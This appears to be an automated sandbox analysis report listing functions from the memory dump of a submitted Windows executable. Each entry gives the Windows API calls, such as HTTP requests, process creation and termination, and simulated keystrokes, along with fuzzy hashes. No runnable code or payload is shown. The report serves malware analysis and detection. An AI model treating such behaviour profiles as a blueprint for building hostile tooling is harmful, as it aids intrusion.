API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
String ID: U
API String ID: 4009187628-3372436214
Opcode ID: c948a839c2a32edda4314486ec18b28ff133bfd89b4456d515003931e34f6051
Instruction ID: 575377fd151704046f765e79b425970e65da681c433c783f39a5140c51211cbd
Opcode Fuzzy Hash: c948a839c2a32edda4314486ec18b28ff133bfd89b4456d515003931e34f6051
Instruction Fuzzy Hash: AE71D035800205EFCF258F64C8C4AAA7BB5FF58360F1443BAED655A2E6D7318981DF60

Function 00C41A15 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00C41A50
HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00C41A7C
InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00C41ABE
InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00C41AD3
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00C41AE0
HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00C41B10
InternetCloseHandle.WININET(00000000), ref: 00C41B57

Part of subcall function 00C42483: GetLastError.KERNEL32(?,?,00C41817,00000000,00000000,00000001), ref: 00C42498
Part of subcall function 00C42483: SetEvent.KERNEL32(?,?,00C41817,00000000,00000000,00000001), ref: 00C424AD

Strings

, xrefs: 00C41B01

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
String ID:
API String ID: 2603140658-3916222277
Opcode ID: ef2f126ed19d7a29117ff5aca3894fa33e800f7d9e346a11f2a37304a7f27c49
Instruction ID: 2a41b6be0b59d85d917047c59f9bed86bcc6d966c571cae9756267570aa7afe4
Opcode Fuzzy Hash: ef2f126ed19d7a29117ff5aca3894fa33e800f7d9e346a11f2a37304a7f27c49
Instruction Fuzzy Hash: BA418CB5501218BFEB158F50CC89FBE7BACFB08354F04412AFE55AA141E7709E859BA0

Function 00C48C46 Relevance: 13.9, APIs: 9, Instructions: 438COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,?,00C5F910), ref: 00C48D28
FreeLibrary.KERNEL32(00000000,00000001,00000000,?,00C5F910), ref: 00C48D5C
QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00C48ED6
SysFreeString.OLEAUT32(?), ref: 00C48F00

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Free$FileLibraryModuleNamePathQueryStringType
String ID:
API String ID: 560350794-0
Opcode ID: dfe47f09d50e82c7bc1a80cf085d5ad47186f8917f2bc49be8d73cd66efb5898
Instruction ID: 27ce2898c23d57bef35ba7bfdf1545230f584e02bd63927764d13d4bc7067d15
Opcode Fuzzy Hash: dfe47f09d50e82c7bc1a80cf085d5ad47186f8917f2bc49be8d73cd66efb5898
Instruction Fuzzy Hash: B8F16C75A00219EFDF14DF94C884EAEB7B9FF49314F108498F915AB251DB31AE4ACB60

Function 00C4F694 Relevance: 13.9, APIs: 9, Instructions: 386processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C4F6B5
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C4F848
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00C4F86C
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C4F8AC
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00C4F8CE
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00C4FA4A
GetLastError.KERNEL32(00000000,00000001,00000000), ref: 00C4FA7C
CloseHandle.KERNEL32(?), ref: 00C4FAAB
CloseHandle.KERNEL32(?), ref: 00C4FB22

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
String ID:
API String ID: 4090791747-0
Opcode ID: a37c77c273b2eba60d5e28e383a149fd59de0de5e9b6c651ce5849f6bcf9bc1f
Instruction ID: e6c2a8e6cb10b81d1a372a0f158bcc9ff4824c8cda1c917297b911a714753d51
Opcode Fuzzy Hash: a37c77c273b2eba60d5e28e383a149fd59de0de5e9b6c651ce5849f6bcf9bc1f
Instruction Fuzzy Hash: 04E1BE31604340AFC714EF24C881B6ABBE1FF85350F1485ADF8999B2A2DB31ED46DB52

Function 00C34CC1 Relevance: 13.7, APIs: 9, Instructions: 170filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00C3466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00C33697,?), ref: 00C3468B

Part of subcall function 00C3466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00C33697,?), ref: 00C346A4

Part of subcall function 00C34A31: GetFileAttributesW.KERNEL32(?,00C3370B), ref: 00C34A32

lstrcmpiW.KERNEL32(?,?), ref: 00C34D40
_wcscmp.LIBCMT ref: 00C34D5A
MoveFileW.KERNEL32(?,?), ref: 00C34D75

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
String ID:
API String ID: 793581249-0
Opcode ID: d31b445448d663d3d46a51641c7c3afcc534659b3feb243b1772f6dbd4340b05
Instruction ID: b630875a510d1e4b80ded7f70995b47621b11e20dd8a25b0e493698c25ee1c69
Opcode Fuzzy Hash: d31b445448d663d3d46a51641c7c3afcc534659b3feb243b1772f6dbd4340b05
Instruction Fuzzy Hash: CF5141B20083859BC724DBA4DC819EFB3ECAF84751F00092EB689D3151EF34B689C766

Function 00C58645 Relevance: 13.7, APIs: 9, Instructions: 168COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 00C586FF

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: InvalidateRect
String ID:
API String ID: 634782764-0
Opcode ID: 140ea23eaf0d365bf1190133624d8518e3dca449682f265046bddb12f4b67943
Instruction ID: c9e892ed48644e5381334ff8ec335e7a5f0268f4f7e25a66b320c6d7e7cd5f85
Opcode Fuzzy Hash: 140ea23eaf0d365bf1190133624d8518e3dca449682f265046bddb12f4b67943
Instruction Fuzzy Hash: E351D138500244FEEB249B258C89F9D7BA4EB05352F600116FE21F62E1CF71AACCDB49

Function 00BD2B72 Relevance: 13.7, APIs: 9, Instructions: 161windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 00C0C2F7
ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00C0C319
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 00C0C331
ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 00C0C34F
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 00C0C370
DestroyIcon.USER32(00000000), ref: 00C0C37F
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 00C0C39C
DestroyIcon.USER32(?), ref: 00C0C3AB

Part of subcall function 00C5A4AF: DeleteObject.GDI32(00000000), ref: 00C5A4E8

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend$DeleteObject
String ID:
API String ID: 2819616528-0
Opcode ID: 09f3dac0aef7d960ffe0daa3da256130ca294ff8d3fe08799eebd06e1fe2c331
Instruction ID: a2ab9e16cafd0afedf3d739028a51affb45f467425858f00209ee9b4c0a9447b
Opcode Fuzzy Hash: 09f3dac0aef7d960ffe0daa3da256130ca294ff8d3fe08799eebd06e1fe2c331
Instruction Fuzzy Hash: DB516B74610305AFDB24DF64CC85BAE77E5EB58310F10466AF912A72E0EBB0AD91DB50

Function 00C2966E Relevance: 13.6, APIs: 9, Instructions: 66sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00C2A82C: GetWindowThreadProcessId.USER32(?,00000000), ref: 00C2A84C
Part of subcall function 00C2A82C: GetCurrentThreadId.KERNEL32 ref: 00C2A853
Part of subcall function 00C2A82C: AttachThreadInput.USER32(00000000,?,00C29683,?,00000001), ref: 00C2A85A

MapVirtualKeyW.USER32(00000025,00000000), ref: 00C2968E
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 00C296AB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000,?,00000001), ref: 00C296AE
MapVirtualKeyW.USER32(00000025,00000000), ref: 00C296B7
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00C296D5
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00C296D8
MapVirtualKeyW.USER32(00000025,00000000), ref: 00C296E1
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00C296F8
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000,?,00000001), ref: 00C296FB

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: 0709dc7633cdc6240ca017d36b3336c06b09401f5747c71cec16211345c7d1bd
Instruction ID: 53569f7d656b02916faf596711c7f5fcbe884f867b997ffd5d2a2dc1b699c7de
Opcode Fuzzy Hash: 0709dc7633cdc6240ca017d36b3336c06b09401f5747c71cec16211345c7d1bd
Instruction Fuzzy Hash: 1A11E1B5910618BFF6106F60EC89F6E3B6DEB4C752F100429F344AB0E0C9F25C91DAA4

Function 00C28921 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,00C2853C,00000B00,?,?), ref: 00C2892A
HeapAlloc.KERNEL32(00000000,?,00C2853C,00000B00,?,?), ref: 00C28931
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00C2853C,00000B00,?,?), ref: 00C28946
GetCurrentProcess.KERNEL32(?,00000000,?,00C2853C,00000B00,?,?), ref: 00C2894E
DuplicateHandle.KERNEL32(00000000,?,00C2853C,00000B00,?,?), ref: 00C28951
GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,00C2853C,00000B00,?,?), ref: 00C28961
GetCurrentProcess.KERNEL32(00C2853C,00000000,?,00C2853C,00000B00,?,?), ref: 00C28969
DuplicateHandle.KERNEL32(00000000,?,00C2853C,00000B00,?,?), ref: 00C2896C
CreateThread.KERNEL32(00000000,00000000,00C28992,00000000,00000000,00000000), ref: 00C28986

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 086b733e16f650fa004784f4aa73e90de13756f5d5de2433d4ccf4394ff4fa6e
Instruction ID: faf9d33a5af2b7769eaf9a7ddc793e35bd537b045b05241f7a8c6258ce540e6c
Opcode Fuzzy Hash: 086b733e16f650fa004784f4aa73e90de13756f5d5de2433d4ccf4394ff4fa6e
Instruction Fuzzy Hash: 3D01BBB9240708FFE710ABA5DC4DF6F3BACEB89711F408425FA05EB1A1CA709841CB21

Function 00C49B23 Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 352COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 00C49BA4, 00C49EC8
Not an Object type, xrefs: 00C49B7B

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: 017944b975ab145649e30c9675cb7dd264b2c6178f377100d3cf7f2d90c5b354
Instruction ID: 8cec0219ad9d07739e47086dfdc1e123212b4ab5d261358f21e7f022675e1f11
Opcode Fuzzy Hash: 017944b975ab145649e30c9675cb7dd264b2c6178f377100d3cf7f2d90c5b354
Instruction Fuzzy Hash: A5C1A471A002299FDF14DF99D884BAFB7F5FF48314F148469E915A7280E7709E45CB90

Function 00C49113 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 263COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00C49167
VariantInit.OLEAUT32(?), ref: 00C49238
VariantInit.OLEAUT32(?), ref: 00C49339
VariantClear.OLEAUT32(?), ref: 00C49343
VariantClear.OLEAUT32(?), ref: 00C493A0

Strings

Null Object assignment in FOR..IN loop, xrefs: 00C491C8, 00C492F6, 00C493AE
Incorrect Object type in FOR..IN loop, xrefs: 00C4931C

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Variant$ClearInit$_memset
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2862541840-625585964
Opcode ID: 72d0888b7af38181274cc07462b1a2e6eec4da40480c92134a597020502824ff
Instruction ID: e0096d590480a6254fcf99a16affc33ad21e0bf8511475c51825f71568ff0d3d
Opcode Fuzzy Hash: 72d0888b7af38181274cc07462b1a2e6eec4da40480c92134a597020502824ff
Instruction Fuzzy Hash: 29919171A00229ABDF24DFA5C848FAFBBB8FF46714F108159F515AB290D7709A45CFA0

Function 00C4975D Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

Part of subcall function 00C2710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C27044,80070057,?,?,?,00C27455), ref: 00C27127
Part of subcall function 00C2710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C27044,80070057,?,?), ref: 00C27142
Part of subcall function 00C2710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C27044,80070057,?,?), ref: 00C27150
Part of subcall function 00C2710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00C27044,80070057,?), ref: 00C27160

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 00C49806
_memset.LIBCMT ref: 00C49813
_memset.LIBCMT ref: 00C49956
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 00C49982
CoTaskMemFree.OLE32(?), ref: 00C4998D

Strings

NULL Pointer assignment, xrefs: 00C499DB

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
String ID: NULL Pointer assignment
API String ID: 1300414916-2785691316
Opcode ID: d02cba1f0b0c5b1accbdb8143ea9483822658cd5ba400f64c7093287fef436f9
Instruction ID: 76f237afa1a6b3d59ce787535d20e0ce9f6b95192bc13e012bec0e1f22f954e0
Opcode Fuzzy Hash: d02cba1f0b0c5b1accbdb8143ea9483822658cd5ba400f64c7093287fef436f9
Instruction Fuzzy Hash: B8911671D00229ABDB10DFA5DC85EDEBBB9FF09310F10416AF519A7291EB719A44CFA0

Function 00C56D80 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 143windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00C56E24
SendMessageW.USER32(?,00001036,00000000,?), ref: 00C56E38
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00C56E52
_wcscat.LIBCMT ref: 00C56EAD
SendMessageW.USER32(?,00001057,00000000,?), ref: 00C56EC4
SendMessageW.USER32(?,00001061,?,0000000F), ref: 00C56EF2

Strings

SysListView32, xrefs: 00C56DF6

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: MessageSend$Window_wcscat
String ID: SysListView32
API String ID: 307300125-78025650
Opcode ID: 82d50e38f60eb156f591a5c681d1e3c185b4d5d8cae91aaca59034c958e2c007
Instruction ID: e0fd8f60c7aba4a16dd1950cf3f95385310fef2e790aac92cfe4b0708f997df1
Opcode Fuzzy Hash: 82d50e38f60eb156f591a5c681d1e3c185b4d5d8cae91aaca59034c958e2c007
Instruction Fuzzy Hash: 0D41C578A00308ABDB219FA4CC45BEE77F8EF08351F50042AF954E7191D6719EC8CB64

Function 00C4E933 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136COMMON

Download Yara Rule

APIs

Part of subcall function 00C33C55: CreateToolhelp32Snapshot.KERNEL32 ref: 00C33C7A
Part of subcall function 00C33C55: Process32FirstW.KERNEL32(00000000,?), ref: 00C33C88
Part of subcall function 00C33C55: CloseHandle.KERNEL32(00000000), ref: 00C33D52

OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C4E9A4
GetLastError.KERNEL32 ref: 00C4E9B7
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00C4E9E6
TerminateProcess.KERNEL32(00000000,00000000), ref: 00C4EA63
GetLastError.KERNEL32(00000000), ref: 00C4EA6E
CloseHandle.KERNEL32(00000000), ref: 00C4EAA3

Strings

SeDebugPrivilege, xrefs: 00C4E9C2

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: f9a6abec2dd48739c34ddf4eb59f61cc07e5134187d304eb81f76eabf5b5c8e4
Instruction ID: 48263762344e38f096919495ad7d8a54c2c31725c7afc00ac49d75063b46fad2
Opcode Fuzzy Hash: f9a6abec2dd48739c34ddf4eb59f61cc07e5134187d304eb81f76eabf5b5c8e4
Instruction Fuzzy Hash: 7441AA312002019FDB14EF24DCA5F6EBBE5BF40714F0884A9F952AB3D2DB71A945EB91

Function 00C32F94 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 00C33033

Strings

question, xrefs: 00C32FEC
stop, xrefs: 00C33004
warning, xrefs: 00C3301C
blank, xrefs: 00C32FB5
info, xrefs: 00C32FD4

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095801258.0000000000C97000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_bd0000_rACq8Eaix6.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: 2d6d23287be28f0416c6548741fdc1f108ab367332ee0b4cb2f00d5dd9813a44
Instruction ID: e0dc3e2c3c130ac897f8fde0d5bd195197b405bcf1bb992cf43b0d01bba8f16a
Opcode Fuzzy Hash: 2d6d23287be28f0416c6548741fdc1f108ab367332ee0b4cb2f00d5dd9813a44
Instruction Fuzzy Hash: 8911273135C3CABEFB18AB55DC82DAB779C9F19364F20006AFA10A6181DB705F4456A4

Function 00C342F8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 00C34312
LoadStringW.USER32(00000000), ref: 00C34319
GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 00C3432F
LoadStringW.USER32(00000000), ref: 00C34336
_wprintf.LIBCMT ref: 00C3435C
MessageBoxW.USER32(00000000,?,?,00011010), ref: 00C3437A

Strings

%s (%d) : ==> %s: %s %s, xrefs: 00C34357

Memory Dump Source

Source File: 00000000.00000002.2095701800.0000000000BD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00BD0000, based on PE: true

Associated: 00000000.00000002.2095685856.0000000000BD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C5F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095746469.0000000000C84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2095784727.0000000000C8E000.00000004.00000001.01000000.00000003.sdmpDownload File
